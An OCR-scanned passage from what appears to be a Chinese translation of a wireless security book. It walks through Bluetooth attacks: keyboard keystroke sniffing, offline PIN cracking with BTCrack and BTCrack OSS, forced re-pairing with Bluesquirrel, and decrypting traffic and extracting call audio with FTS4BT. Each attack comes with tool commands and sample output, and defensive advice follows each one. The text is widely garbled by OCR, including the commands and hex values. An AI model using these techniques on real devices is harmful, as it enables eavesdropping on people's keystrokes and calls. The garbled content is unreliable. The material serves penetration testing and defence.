在 本 例 中 ,我 们 看 到 用 户 的 击 键 记 录 是 qwerty123。 不 论 用 户 是 在 写 一 份 电子 邮件 ， 还 是 输入 银行 信息 或 者 输入 系统 的 登录 
密码 ， 这 些 击 键 记录 都 会 被 我 们 获取 。 


国防 御 蓝 牙 键 盘 窃 听 


要 防御 被 动 蓝 牙 键盘 写 听 ， 请 避免 使 用 HID 的 局 动 模式 ， 因 为 它 会 以 明文 友 送 通信 数据 包 。 我 们 建议 使 用 主机 上 的 蓝牙 栈 ， 


这 样 用 户 就 能 够 利用 蓝牙 HID 规 范 中 的 加 密 和 认证 选项 。 


在 Windows XP、Windows Vista 和 Windows 7 上 ， 本 地 蓝牙 栈 并 不 支持 蓝牙 HID 规 范 。 因 此 ， 许多 连接 到 Windows 系 统 
上 的 蓝牙 键盘 都 不 能 使 用 任何 形式 的 加 密 。 作 为 补救 措施 ， 请 安装 一 个 完全 支持 监 牙 HID 规 范 的 第 三 方 蓝 牙 栈 ， 比 如 
Broadcom/Widcomm、Toshiba 以 及 BlueSolell 这 些 产 商 所 提供 的 监 牙 栈 。 


请 不 要 按照 大 部 分 蓝牙 键盘 用 户 手 册 中 描述 的 简单 方法 建立 连接 ， 这 举 廊 法 包括 按 下 监 牙 UsB 接 口上 的 按钮 ， 然 后 在 键盘 和 
女 标 上 按 下 相似 的 按钮 。 这 个 过 程 通 常 都 会 建立 局 动 模式 连接 ， 将 赣 牙 会 话 暴 露 在 被 动 攻 击 之 下 。 可 以 从 客 己 机 的 操作 系统 上 本 
置 主机 系统 ， 使 用 蓝牙 栈 管 理工 具 提 供 对 HID 的 文 持 。 


国 侧 h 蓝 可 键盘 


尽管 许多 蓝牙 键盘 在 HID 模 式 下 都 没有 加 密 措施 ， 但 是 可 以 使 用 完整 蓝牙 键盘 规范 中 的 措施 来 加 密 通 信 数 据 包 ， 以 此 来 防御 
窃听 攻击 。 不 要 及 用 HID 模 式 来 支持 蓝牙 键盘 ， 应 该 使 用 主机 设备 上 的 蓝牙 栈 。 在 配置 主机 上 的 蓝牙 栈 时 ， 请 确保 开启 了 所 有 可 
用 的 加 密 选 项 ， 这 样 就 能 防止 攻击 者 捕获 击 键 记录 ， 保 护 敏感 数据 不 馈 港 露 。 


9.3 ”本 童 小结 
本 章 讲解 了 多 种 攻击 者 可 以 进行 蓝牙 窃听 的 技术 。 与 IEEE 802.11 不 同 ， 由 于 采用 了 FHSS， 因 此 蓝牙 拥有 许多 固有 物理 层 特 
性 ， 导 有 致 通过 跳 频 扩 频 进行 的 窃听 变 得 很 困难 。 商 业 和 开源 的 工具 克服 这 些 困 难 ， 它 们 的 效果 、 成 本 ， 还 有 复杂 性 都 不 相同 。 


一 旦 攻击 者 建立 好 了 工具 进行 监 牙 窃听 ， 他 可 以 有 多 种 选择 来 攻击 监 牙 网 络 ， 包 括 获取 目标 主机 之 间 未 加 密 的 数据 和 窃听 
HID 模 了 式 下 的 监 牙 键盘 。 第 10 章 会 继续 使 用 监 牙 窃听 器 来 攻击 监 牙 网 络 ， 目 标 包 括 加 密 和 未 加 密 的 数据 传输 。 


第 10 章 ” 监 直 攻击 和 漏洞 利用 


许多 机 构 通 弟 都 不 会 重视 监 牙 设备 所 市 来 的 威胁 。 他 们 会 花费 大 量 的 精力 ， 通 过 漏洞 评估 、 渗 延 测 试 或 者 道德 黑客 参与 来 加 
固 Wi-Fi 网 络 ， 但 是 在 监 牙 安全 上 却 很 少 有 所 作为 。 


很 少 有 机 构 愿 意 在 蓝牙 网 络 上 花费 资源 进行 评估 ， 其 中 的 原因 是 ， 他 们 有 这 样 一 个 普遍 的 误解 : 蓝牙 安全 与 我 们 没有 关系 ， 
因为 它 并 不 会 威胁 到 我 们 的 重要 资产 。 即 使 有 机 构 意 识 到 了 蓝牙 所 市 来 的 威胁 ， 但 也 很 少 有 人 具备 高 超 的 扩 忆 以 及 专业 知识 来 成 
功 地 进行 蓝牙 渗 适 测试 ， 或 者 模拟 入 侵 捐 定 的 监 直 设备 。 


在 本 草 中 ， 我 们 会 消除 人 们 对 于 蓝牙 反 术 不 会 市 来 威胁 的 这 个 误解 ， 给 予 读者 攻击 监 牙 网 络 所 需要 的 指导 和 专业 知识 。 我 们 
会 根据 蓝牙 使 用 过 程 中 的 漏洞 或 者 规 学 本 身 存 在 的 漏洞 ， 讲 述 多 种 攻击 蓝牙 设备 的 方法 。 在 读 完 本 草 ， 使 用 过 我 们 提 到 的 一 些 工 
具 后 ， 读 者 能 够 成 功 实现 这 些 攻 击 ， 从 而 确认 蓝牙 技术 给 你 市 来 的 威胁 ， 同 样 也 可 以 成 功 地 进行 一 次 渗透 测试 。 


10.1 PIN 攻击 


在 第 8 章 中 ， 我 们 讲 过 两 个 设备 进行 配对 后 派生 出 一 个 128 位 的 链 路 密 铀 ， 在 认证 呼叫 设备 和 加 密 通 信 数 据 包 的 过 程 中 都 会 
使 用 到 它 。 在 监 牙 2.1 规 范 之 前 ， 这 个 交换 配对 是 通过 一 个 PIN 信 进行 保护 的 。 


尽管 可 以 使 用 赣 牙 2.1 规 学 中 引入 的 安全 简单 配对 机 制 ， 但 大 部 分 蓝牙 用 尸 仍然 使 用 传统 的 PIN 认 证 机 制 来 初始 化 交换 本 
对 。 这 区 在 设备 之 间 产 生 了 一 个 很 大 的 漏洞 ， 攻 击 者 可 以 跟踪 交换 配对 ， 对 PIN 的 选择 进行 离线 暴力 攻击 。 在 配对 过 程 结束 后 ， 
随后 的 连接 都 会 使 用 存储 的 128 位 链接 密 钥 进行 认证 和 密 铀 衍生 ， 目 前 是 无 法 对 它 进行 攻击 的 。 


为 了 破解 PIN 人 信息， 攻击 者 站 先 要 获取 以 下 这 些 信 息 : 
` IN_RAND， 由 发 起 方向 回应 方 发 送 。 
` 2 个 COMB_KEY 值 ， 发 起 方 和 回应 方 都 会 发 送 。 
-AU_RAND， 由 认证 呼叫 方 发 送 。 
: 签署 响应 (Signed Response，SRES) ， 由 认证 确认 方 发 送 。 


注意 ”这 里 我 们 使 用 术语 发 起 方 和 回应 方 分 别 表示 发 起 交换 配对 以 及 进行 回应 的 设备 。 在 大 多 数 情 况 下 ， 主 设备 是 发 起 方 ， 
从 设备 是 回应 方 ( 从 配对 角度 来 讲 ) ， 但 是 这 也 不 是 绝对 的 。 从 设备 也 有 可 能 发 起 交换 配对 ， 主 设备 对 此 做 出 回应 。 


由 于 蓝牙 认证 机 制 采用 的 是 相互 身份 认证 (从 设备 同 主 设备 认证 ， 反 之 亦 然 ) ， 所 以 攻击 者 有 两 次 机 会 确认 AU_RAND 和 
SRES 值 。 攻 击 者 可 能 并 不 关心 交互 本 身 ， 但 是 确认 进行 认证 的 设备 是 十 分 重要 的 ( 主 设备 或 者 从 设备 的 监 牙 地 址 ) 。 此 外 ， 攻 
击 者 需要 知道 从 设备 或 者 主 设备 的 蓝牙 地 址 ， 它 在 交换 配对 中 并 不 会 进行 传递 。 


注 是 ”在 暴力 攻击 PIN 的 时 候 ， 攻 击 者 需要 完整 的 蓝牙 地 址 。 只 知道 LAP 和 UAP 部 分 是 不 够 的 ， 还 需要 指定 正确 的 NAP。 
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BTCrack 是 由 Thierry Zoller 编 写 的 Windows 监 牙 PIN 攻 击 工 具 。 
对 低 的 分 数 ， 但 是 通过 捕获 配对 数据 对 PIN 进 


为 了 使 用 BTCrack， 首 先 要 进行 配对 交换 数据 包 捕 获 。 如 果 通 


认 IN RAND、COMB KEY、AU RAND 和 SRES 值 ， 如 下 图 所 示 。 
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一 旦 确认 这 些 字段 填 序 后 ，BTCrack 应 该 试图 恢复 最 大 PIN 长 度 ， 然 后 点 击 Crack (破解 ) 按钮 。BTCrack 会 对 PIN 值 进行 穷 
举 ， 直 到 它 找到 了 正确 的 PIN 值 或 者 测试 完了 所 有 可 能 的 PIN 值 。 
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提示 “BTCrack 图 形 用 户 界面 对 PIN 攻击 的 回应 很 迟钝 ， 黄 至 在 PIN 破解 的 过 程 中 会 出 现 假死 机 。 所 以 让 BTCtrack 保 持 运 行 直 
到 它 完 成 攻击 。 


在 本 例 的 输出 中 可 以 看 到 ， 在 成 功 破解 PIN 后 ，BTCrack 会 将 它 显 示 出 来 作为 攻击 的 一 部 分 ， 图 中 还 包括 了 128 位 的 链接 密 
铀 。BTCrack 还 会 显示 破解 密 钥 所 需要 的 时 间 (或 者 测试 完 所 有 可 能 PIN 值 的 时 间 ) ， 在 状态 栏 上 还 会 显示 每 秒 破解 的 PIN 的 数 
量 。 在 这 个 例子 中 ， 作 者 的 1.2GHz Core 2 Duo 系 统 每 秒 大 约 进 行 了 99000 次 PIN 破 解 。 


BTCrack 的 作者 声称 在 2GHz Core 2 Duo 系 统 上 ，20 万 的 工具 能 达到 每 秒 20 万 次 的 破解 速度 。 由 于 许多 用 户 选 择 了 4 字符 长 
的 PIN， 所 以 在 最 差 的 情况 下 ，BTCrack 只 需要 测试 1 万 个 不 同 的 PIN 值 ， 在 1 秒 内 就 可 以 完成 。 蓝 牙 中 的 PIN 值 最 多 可 以 有 16 个 
值 ， 在 最 糟糕 的 情况 下 ， 攻 击 者 需要 测试 1015 个 不 同 的 PIN 值 。 以 每 秒 20 万 的 猿 解 速度 ，BTCrack 需 要 差不多 1600 年 来 尝试 所 
有 可 能 的 PIN 值 。 


幸运 的 是 ，BTCrack 不 仅 可 以 使 用 CPU 实现 PIN 攻击 ， 同 样 也 可 以 使 用 Pico Computing 销 售 的 FPGA 进 行 本 地 PIN 破解 。 
Zoller 声 称 ， 通 过 使 用 Pico Computer 的 E-14 FPGA，PIN 破 解 的 速度 可 以 达到 每 秒 3000 万 次 。 这 样 对 于 前 面 说 的 16 位 PIN 值 来 
说 ， 单 个 E-14 将 破解 的 时 间 从 1600 年 缩短 到 10.6 年 ， 这 样 破解 所 需 的 时 间 就 趋 于 合理 了 。 如 果 通 过 多 个 E-14 合 作 破 解 ， 那 么 所 
需要 的 时 间 还 能 继续 缩短 。 


BTCrack 需 要 成 功 破解 PIN 的 一 个 难点 是 用 尸 要 确保 从 交换 配对 过 程 中 获取 的 数据 都 应 该 是 正确 的 。 如 果 其 中 包含 有 不 正确 
的 值 ， 那 么 破解 过 程 会 持续 进行 直到 用 尸 中断 它 。 要 简化 提供 配对 数据 的 过 程 ， 作 者 提供 了 一 个 选项 使 工具 可 以 从 FTS4BT 生 成 
的 CSV 报 告 中 读 取 数据 。 但 是 只 有 老 版 本 的 FTS4BT 才 有 这 个 功能 (包括 第 9 章 提 到 的 FTS4BT5.6.9.0) ， 当 前 的 软件 版 本 采用 的 
是 新 的 CSV 输 出 文件 格式 ， 所 以 它 并 不 支持 这 项 功能 (之 后 版 本 的 FTS4BT 生 成 的 CSV 输 出 文件 并 不 包含 足够 的 信息 来 进行 PIN 


攻击 ) 。 


提示 在 本 书 的 配套 网 站 上 ， 可 以 找到 一 份 BTCrack 可 使 用 的 CSV 报 告 ， 其 中 包括 耳机 和 电话 之 间 的 蓝牙 交换 配对 过 程 ， 还 
有 双方 的 蓝牙 地 址 。 


@ "BTcrack Oss 


A 
3 
1 


了 


BTCrack Oss 是 BTCrack 引 擎 的 开源 版 本 ， 它 是 一 个 命令 行 工 具 。BTCrack OSS 可 以 跨 平台 使 用 ， 它 通常 被 用 在 Linux 和 其 
他 不 同 版 本 的 UNIX 系 统 上 。 尽 管 没 有 Windows 版 本 上 能 够 使 用 FPGA 的 功能 ， 它 在 性 能 上 还 是 有 小 幅 的 提升 ， 开 放 源 代码 也 使 
它 提供 了 对 Linux 系 统 的 支持 。 


在 编写 本 书 的 时 候 ， 最 新 版 本 的 BTCrack OSS 在 破解 前 面包 含 0 的 PIN 值 时 会 出 现 错误 (比如 像 “0000” 这 样 的 值 ) 。 要 解 
决 这 个 问题 ， 我 们 需要 为 BTCrack OSS 的 源 代 码 打 上 补丁 ， 如 下 所 示 : 


waet -gq http://secdev.zoller.lu/BTCrack O88.tar 
tar xf BICrack O85S.tar 
cd BICrack DSS 


woet Gq Www.willhackforsushi.com/code/BTCrack-0S3-—pinfix.difrft 


TU AT AT UD 


patch -p0 <BTCTrack-OS3S-pinfix.diff 


patching file btcrackmain.c 


注意 ”如果 BTCrack OSS 的 版 本 号 大 于 1.0， 那 么 就 不 需要 安装 补丁 来 修正 这 个 错误 了 。 


BTCrack OSS 并 不 使 用 Makefile 文 件 来 创建 程序 。 它 米 用 执行 脚本 进行 编译 ， 这 样 束 拥 有 了 更 好 的 跨 平 台 能 力 。 可 以 按照 


下 面 的 方法 编译 BTCrack OSS 的 源 代码 : 


$ ./compile.sh 


Code should be -Wextra -pedantic -Wall clean on gcc, but nct all 


compilers support those flags 
On solaris vou might want to change -03 to xO3... 
cc O03 .cc —lpthread —o btcrack 


不 带 有 任何 参数 运行 BTCrack 的 可 执行 文件 ， 工 具 会 显示 它 的 用 法 : 


$s . /btcrack 
:btcrack <#threads> <master addry> <slave addr> <filename.csvy> 
:btcrack <#threads> <master addry> <asalave addr> <in rand> <comb mastery> 


<Comb slavey> <AaAuU rand my> <au Irand sy <sres mY> <Sres 号 > 


BTCrack OSS 可 以 恢复 配对 数据 ， 不 论 是 从 传统 的 FTS4BT CSV 输 出 的 文件 (不 能 使 用 最 新 版 本 的 FTS4BT CSV 输 出 文件 ) 
或 者 根据 在 命令 行 中 以 16 进 制 形 式 指 定 的 数值 。 必 须 指定 主 设备 和 从 设备 的 蓝牙 地 址 。#thread 参 数 表示 BTCrack OSS 会 使 用 多 
CPU 内 核 加 速 破 解 过 程 。 要 获得 最 佳 的 结果 ， 可 以 指定 的 线程 数量 比 系统 可 用 内 核 的 数量 大 1。 


BTCrack OSS 软 件 排 列 数据 的 顺序 十 分 奇怪 ， 因 为 它 并 不 按照 正常 的 顺序 来 接收 数据 中 的 字段 (举例 来 吕 ， 必 须 指 定 主 设 
备 AU_RAND、 从 设备 AU_RAND、 主 设备 SRES、 从 设备 SRES， 尽 管 它 们 原本 的 顺序 是 主 设备 AU_RAND、 从 设备 SRES、 从 设 
备 AU_RAND、 主 设备 SRES) 。 在 本 例 中 ， 我 们 使 用 下 面 的 交换 配对 数据 值 配合 BTCrack OSS 破 解 PIN， 字 段 的 顺序 如 下 所 示 。 


顺序 字段 效 值 

| Master BD_ADDR 00;11:9F:C4:F3:AE 

2 Slave BD_ADDR 00:60.57;1A:6B:F!1 

3 IN_RAND EC:50;3F:;96:EF:26:97:7E:4E:DE:35:;10:9D.;6A :91.;68 

4 Master COMB KEY 76:4F:DA:77:B7:EE:88:9A:6C:11:D0:CA:08:83:73:CD 
5 Slave COMB_ 上 LEY FF:80:DF:E2:CD:72:83:76:83:A4:9C:C9:A7:El1:C3:BB 
6 Master AU_RAND ”97:30:ED:DB:FD:30:1B:B8:CE:1A:20:A8:C3:D2:79:Dl 
7 Slave AU_RAND 1C:2B:D8:3F:15:7A:49:58:B4;F8:ED;3F:6D:F1:62:20 
8 Master SRES 20:00:6D:00 

9 Slave SRES 10:D5:C0:DC 


注意 BTCrack OSS 的 使 用 信息 指出 首先 获取 的 是 主 设备 指定 的 字段 ， 这 就 表示 主 设备 发 起 了 交换 配对 ， 从 设备 进行 了 回 
应 。 我 们 前 面 说 过 ， 从 设备 也 可 以 初始 化 交换 配对 ， 在 这 种 情况 下 ， 主 、 从 设备 的 位 置 就 应 该 互相 交换 。 如 果 从 设备 发 起 交换 配 
对 ， 只 需要 把 BTCrack OSS 指 定 的 从 设备 位 置 替 换 成 主 设 备 ， 反 之 亦 然 。 


如 果 在 BTCrack OSS 中 指定 了 正确 的 配对 数据 的 顺序 ， 可 以 获得 你 想 要 的 结果 ， 如 下 所 示 。 


-» jbBtcecrack 3 O00:11]:90F:CA4:F3:BAE O00:60:51:1A:6B:F]1 


FEC:o00: 3F: 06: EF:26:97: 1E: 4E:DE: 305:10:9D:6A:91]1:68 

TO:A4F: DA: TTT:Bi:EE: 08:9A:6C0:11:DO:CA:098:83:73:CD 

FE:O0sDF :Ea IAG3 0 BArBd G0 ATEl :C47:BB 

OTF: 0: ED: DB: FFD: 330: 1B:BB:CE: 1A:20:AB8: C3:D2: 19: D1 

IC:2B: DB: 3F: 19: [A: 490:0B: BA: FH: ED: 3F: 6D:F1l:62:20 26:06:6D:00 10:D3:CO: DC 
Link Key: 得 总 
Pin: fi:eG:ejd:2c: ld:2a:0b: of:c2:4c:41 :fa:bo: 30:Bc:b] 


Pins/Sec: 12286 
注意 ”BTCrack OSS 中 的 显示 结果 会 有 一 定 的 延 时 。 本 例 中 正确 的 PIN 值 应 该 是 “9955”。 


为 PIN 破解 提供 监 牙 地 址 


尽管 从 交换 配对 捕获 的 数据 包 内 ， 我 们 能 够 获得 大 部 分 用 来 攻击 PIN 选择 的 数据 ， 攻 击 者 还 需要 提供 完整 的 蓝牙 地 址 。 如 果 
配对 过 程 是 在 不 可 发 现 模 式 下 进行 的 ，hcitool scan 可 以 轻易 地 找到 这 些 地 址 信息 。 如 果 两 个 设备 都 配置 在 不 可 发 现 模式 下 ， 那 么 
问题 就 变 得 有 些 棘 手 了 。 


在 连接 建立 过 程 中 ， 捕 获 的 数据 包 可 以 帮助 我 们 获得 跳 频 序列 (Frequency Hop Synchtonization，EFHS) 帧 内 的 蓝牙 地 址 信 
和 总 。 在 连接 建立 之 前 ， 这 些 帧 包含 了 主 设备 的 蓝牙 地 址 ， 同 样 ， 如 果 主 、 从 设备 交换 角色 ， 那 么 泄露 的 就 是 从 设备 的 蓝牙 地 址 。 
使 用 gf-bluetooth 和 \Witeshatk 解 密 揪 件 ， 通 过 拼接 NAP、UAP 和 LAP 数 据 获 得 FHS 帧 内 的 蓝牙 地 址 。 


国人 态 彻 PIN 破解 攻击 


监 牙 目 身 存在 的 漏洞 导 至 了 PIN 破 解 攻击 ， 同 时 这 也 是 开发 安全 简单 配对 认证 机 制 的 主要 原因 之 一 。 如 果 可 能 的 话 ， 用 户 在 
交换 配对 过 程 中 应 该 尽量 使 用 SSP 取 代 传 统 的 PIN 认 证 ， 从 而 防御 这 些 攻击 。 


通常 ， 在 最 新 的 蓝牙 设备 中 都 不 提供 SSP 选 项 ， 退 使 用 尸 只 能 使 用 传统 的 配对 机 制 。 如 果 攻 击 者 要 使 用 BTCrack 和 BTCrack 
O3s9 这 样 的 工具 ， 那 么 他 需要 对 设备 之 间 的 交换 配对 进行 捕获 。 要 避免 在 这 段 时 间 内 受到 攻击 ， 用 户 应 当 在 攻击 者 无 法 实现 窃听 
的 区 域内 进行 配对 。 换 言 之 ， 用 户 不 应 该 在 商店 、 购 物 中 心 或 者 其 他 公众 场合 内 进行 配对 。 


现实 生活 中 的 PIN 破解 


就 像 前 面 看 到 的 那样 ， 如 果 攻 击 者 能 够 对 交换 配对 进行 捕获 ， 那 么 进行 PIN 破 和 解 攻击 简直 丈 是 易 如 反 擎 。 然 而 ， 这 个 威胁 只 
是 短暂 的 ， 一 旦 设备 配对 成 功 忆 后 ， 它 们 融 不 再 使 用 PIN 进行 认证 ， 取 而 代 之 的 是 交换 配对 中 衍生 的 128 位 链接 密 钥 。 


从 机 会 主义 攻击 的 角度 来 说 ， 在 许多 公众 场合 ， 比 如 购物 中 心 的 美食 广场 和 咖啡 店 中 经 弟 都 能 看 到 人 们 进行 蓝牙 配对 。 在 作 
者 所 在 的 城镇 中 ， 当 地 的 starbucks 残 在 AT&T 移 动 商店 的 蔗 边 ， 所 以 经 单 有 消费 者 走 进 咖啡 店 ， 一 边 喝 着 咖啡 ， 一 边 拆卸 产品 
的 包 浴 ， 将 新 买 的 手机 与 蓝牙 耳机 进行 配对 。 


如 果 正 在 攻击 一 个 已 经 配对 完毕 的 极 微 网 ， 那 么 还 存在 其 他 的 方法 能 够 迫使 设备 进行 重新 配对 。 在 Yaniv Shaked 和 和 Avishai 
Wool 友 表 的 论文 “Cracking the Bluetooth PIN” 中 ， 攻 击 者 可 以 模拟 出 两 个 设备 中 任意 一 个 的 蓝牙 地 址 ， 从 而 改变 它们 之 间 
的 配对 状态 。 


这 种 方法 称 为 重 配 攻 击 ， 攻 击 者 假定 极 微 网 中 一 个 设备 的 蓝牙 地 址 。 一 旦 他 假设 的 地 址 与 目标 匹配 之 后 ， 他 会 尝试 与 目标 设 
备 进 行 连 接 。 这 个 连接 理所当然 会 失败 ， 因 为 攻击 者 并 不 知道 初始 交换 配对 中 使 用 的 链接 密 钥 。 连 接 失 败 之 后 ， 许 多 蓝牙 设备 会 
丢人 弃 之 前 为 假定 的 监 牙 地 址 所 保存 的 链接 密 钥 ,认为 它 已 经 从 远程 设备 中 删除 了 。 当 合法 设备 再 次 尝试 连接 时 ， 之 前 创建 的 链接 


密 钥 束 不 再 有 效 了 ， 导 至 连接 失败 ， 然 后 提示 用 尸 重 新 进行 配对 ， 这 样 束 为 攻击 者 创造 了 一 次 捕获 交换 配对 的 机 会 。 


人 @ 重 本 攻击 工具 Bluesquirre 


这 级 


Bluesquirrel 工 具 可 以 简化 攻击 以 及 捕获 交换 配对 的 过 程 ， 还 能 够 皮 起 重 配 攻击 。 为 了 成 功 地 攻击 和 捕获 PIN 交换 数据 ， 我 
们 需要 标准 的 CSR 蓝 牙 接口 以 及 FTE ComProbe， 但 是 实际 上 ， 发 起 重 配 攻击 的 工具 只 需要 CSR 接 口 (举例 来 况 ， 如 果 网 络 窃 听 
针对 另 一 从 主机 或 者 配合 USRP 进 行 ) 。 
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要 安装 Bluesquirrel， 首 先 从 网 站 上 下 载 压 缩 包 ， 然 后 如 下 所 示 进 行 解压 。 解 压 完毕 后 ， 运 行 build.sh 脚 本 ,编译 C 源 代码 来 
生成 工具 。 


woet 一 本 ht 
tar XEz Pluaesqulirrel WO0.l .tyz 
co BLalesquirrel YO 

. /buid.sh 


二 


chmod 十 bsogqu. py 

[二 | Building bccmd by Marcel] Holtmann 

[二 | Building bdaddr.c by Marcel Holtmann 
[十 Building frontline.c by Sorbo 

[十 | Building bpincrack—v0.3 by David Hulton 
可 CC Wall -=O02 
dec Wall =Q2 fanroll Lio60Bs 一 站 PPIncCrack 


picod/libpicod.ce 


-funrecll—loocops 下 


picod/libpicod. 


1 


pijcod/libpicoed.c:102: warning: 

with attribute warn Unised resuit 
repeated warning removed 

bicod/liibpicod,.c:216: 


WAaAInNnindg: ignoring 


with attribute warn Unused result 


提示 ”在 创建 Bluesquirrel 工 具 时 ， 可 以 安心 地 忽略 编译 过 程 中 的 错误 提示 。 


我 们 还 可 以 选择 下 载 修改 版 的 Bluesquirrel， 


5 WIet -dq www.willhackforsushi.com/c 
3 chmod 755 bsqu.py 


tp://bluetooth-pentest.narod.ru/software/bluesquirr 


Tn functien picosetotff": 


lagnoring return 


人 


4: VO Latgdz 


malin.cec 


Sdfer.o eG malinNn.o 


value of "write™, 


return value of "read", declared 


通过 直接 指定 蓝牙 地 址 ， 用 户 能 够 攻击 不 可 友 现 模式 下 的 蓝牙 设备 。 


e/bsqu.py 


下 一 步 ， 插入 FTE ComProbe 和 和 CSR 接口 ， 以 root 权 限 运 行 bsqu.py， 按 照 工具 的 提示 进行 操作 。 在 本 例 中 ， 我 们 选择 
MacBook Pro 作 为 主 设备 ， 蓝 牙 电 话 作为 从 设备 ， 使 用 重 配 攻 击 伪 装 成 MacBook Pro， 借 此 使 蓝牙 耳机 上 的 链接 密 钥 失效 。 注 


意 ， 工 具 上 会 显示 CompProbe 文 持 “RAW mode (原始 模式 ) ”。 


Ta 


+ 3udo Python bsqu.py 


found HCI devlices: 


rr number of sniffter device: 1 
aettind Reiu tor snitt 
> enter number of ingq/attack device: 2 
settindg hcil for ingquiry/attack 
3cCanning for devices... 
discoverable devilices: 
00:1B:63:5D:56:6C Joshua Wrighté#s Computer {Computer, Laptop (Ox3a0l0c})) 
2 O00:1D:25:EC:41:86 SCH-=1760 (Comuter, Palm (Oxl120114)) 
> eriter number of master device to sniff (or BD -ADDPR) 3 1 
3aetting UV0:1B:063:0D:9506:0C as master device to sn1itt 


Es 


> enter number of slave device to snitf {or BD ADDR}): 2 


3ettIing O00:1D: EC:41:86 as slave device to snitfti 
> do we need to break pair relationship between sniffing devices? vy/n: 了 


> attack master or slave? m/s: mm 
doitid Sur mdlc. 。 

bd addr of hcil changed 
resetting done. 

hciconfig ~—# hcil] auth 

HolteowE = hell ce: DO Bod nD oe: de 

Can't create connection: Connection timed out 
we did all we can. 

ma of hcil changed to original 

resetting done. 
2 


r to sniff, start? YA Tn 


在 Bluesquirrel 显 示 的 结果 中 ， 我 们 看 到 工具 在 将 攻击 接口 的 蓝牙 地 址 修改 为 电话 的 蓝牙 地 址 之 后 ， 它 会 尝试 与 主 设备 进行 
连接 (hcitool-i hcil cc) 。 要 获得 最 佳 的 效果 ， 可 以 重复 这 个 步骤 ， 这 次 选择 从 设备 作为 攻击 目标 ， 目 标 是 使 其 存储 的 链接 密 
钥 变 得 无 效 。 


在 “ready to sniff.start? (准备 窃听 。 开 始 ?) ”提示 处 回答 yes，Bluesquirrel 会 开局 frontline 工 具 尝 试 捕获 PIN 交 换 。 
一 旦 确认 PIN 交换 开始 进行 后 ，Bluesquirrel 开 始 进行 蓝牙 PIN 攻击 ， 举 试 获取 交换 过 程 中 的 PIN 和 链接 密 钥 信 息 。 


国防 御 重 配对 攻击 


当 一 个 没有 链接 密 钥 的 伪造 设备 友 起 连接 请 求 时 ， 并 不 是 所 有 的 蓝牙 设备 都 会 丢 芥 原来 的 链接 密 钥 ， 这 样 束 减 小 了 受到 这 种 
攻击 的 危险 。 攻 击 一 旦 成 功 忆 后， 用 户 惑 会 居 迫 与 设备 进行 再 次 配对 ， 重 新 输入 PIN 值 。 


我 们 建议 用 户 在 那些 安全 的 场所 输入 他 们 的 PIN 值 。 如 果 在 公众 场合 或 者 黑客 会 议 上 ， 设 备 突然 提示 用 户 输 入 PIN 值 ， 我 们 
的 最 佳 建议 是 停止 使 用 蓝牙 ， 然 后 返回 到 那些 不 会 受到 赣 牙 窃听 攻击 的 地 方 。 


一 旦 链接 密 钥 暴 露 了 之 后 ， 攻 击 者 可 以 有 多 种 选择 攻击 极 微 网 ， 包 括 解密 通信 数据 包 以 及 伪造 成 一 个 合法 设备 。 


兮 ”使 用 FTS4BT 解 密 数 据 


使 用 FTS4BT， 我 们 可 以 通过 指定 链接 密 铀 ， 开 始 一 次 新 的 捕获 数据 包 ， 实 时 对 通信 数据 包 进 行 解 密 。 局 动 FTS4BT Air 
Sniffer 工 具 ， 在 FTS4BT Datasource (数据 源 ) 窗口 选择 I/O Settings (MO 设置 ) 。 在 Encryption (加 密 ) 设置 列表 中 选择 
Link Key (链接 密 钥 ) ， 以 十 六 进 制 形式 输入 链接 密 铀 ， 如 下 图 所 示 。 同 时 输入 主 设备 和 从 设备 的 监 牙 地 址 ， 然 后 点 击 OK 按 钮 
关闭 MO Settings (I/O 设置 ) 窗口 。 


lO Settings 


Llock Synchronmzation: [Slave Page - Page Slave to estimate Its clock ww alt for Master to page the Slave. ™ 


| Drift Compensation 


Discover Dewices | Master |[0x00027618f1be) "| Class. |Al "| 
5wap 
| Slave: |[0x00027619e167] Llass: |Al 到 


| LB&P-UAP-NAP 


Lhoose Palr from 


Device Database... 


Encryption: Filter Dut: 


LnkKey | | C0/sCo 


I Nulls and Polls 
Dxf7ebe3ac1d2agb5ofcedcdlhabh5308cb7 


Advanced... : Lancel ] Help ] 


注意 ”不 能 向 正在 运行 中 的 FTS4BT 数 据 包 捕获 添加 链接 密 钥 ， 因 为 解密 过 程 也 是 通过 ComeProbe 进 行 的。 


使 用 MO Setting (MO 设置 ) 窗口 指定 的 链接 密 钥 ，ComProbe 会 实时 解密 任何 FTS4BT 捕 获 的 数据 包 ， 然 后 将 它们 当做 解 
密 数据 发 送 到 Air Sniffer 软 件 。 由 于 数据 已 经 解密 ， 因 此 我 们 可 以 使 用 FTS4BT 内 置 的 提取 工具 (View (视图 ) |Extract 
Data (提取 数据 ) ) 获取 传输 的 文件 或 基于 串口 的 RFCOMM 数 据 。 此 外 FTS4BT 还 可 以 从 数据 流 中 提取 音频 会 话 。 


注意 为 了 正确 地 解密 通信 数据 包 ，FTS4BT 需 要 跟踪 主 、 从 设备 响应 内 的 AU_RAND 和 SRES 并 为 每 个 会 话 生成 加 密 密 钥 。 


如 果 出 现 掉 帧 或 者 坏 帧 ， 那 么 它 就 无 法 解 冤 剩余 的 通信 数据 包 了 。 


得 到 了 链接 密 钥 后 ， 假 设 蓝牙 耳机 和 手机 之 间 的 连接 包含 SCO 音 频数 据 ， 那 么 FTS4BT 能 够 将 它 提取 出 来 并 且 保 存 为 NAV 文 
件 。 在 FTS4BT 主 窗口 ， 或 者 Frame Display ( 帧 显示 ) 窗口 中 ， 扣 击 View (视图 ) |Export WAV File (输出 WAV 文 件 ) 打开 
Audio Extraction Setting (音频 提取 设置 ) 对 话 框 ， 如 下 图 所 示 。 可 以 将 数据 保存 为 TIWo Mono Files (两 个 单 声 道 ) 文件 

( 主 对 从 为 第 一 个 文件 ， 从 对 主 是 第 二 个 文件 ) 或 者 One Stereo File (一 个 立体 声 ) 文件 ， 同 时 指定 输出 路 径 以 及 文件 名 ， 点 
击 OK 按 钮 。FTS4BT 会 从 解密 完毕 的 音频 会 话 数据 中 进行 提取 并 保存 为 WAV 文 件 格式 ， 它 可 以 企 大 部 分 的 数字 多 媒体 播放 器 软 
件 内 播放 。 


3 Audio Extraction Settinps 


Path | CA 


| 
Base Filename: Headset-Audio-]1 
te Streams as... 
0) Two Mono Files 
Dre Stereo File 


Dvernwrte existing fles with same name 
Cornvert AB-Law and p-law to Linear PLM 


LVSD rs always converted 


对 于 多 数 蓝 牙 耳 机 用 户 来 说 ， 攻 击 者 能 够 捕获 、 解 密 和 穷 听 音频 会 话 的 确 是 一 件 令 他 们 十 分 关心 的 事情 。 除 此 之 外 ， 还 有 其 
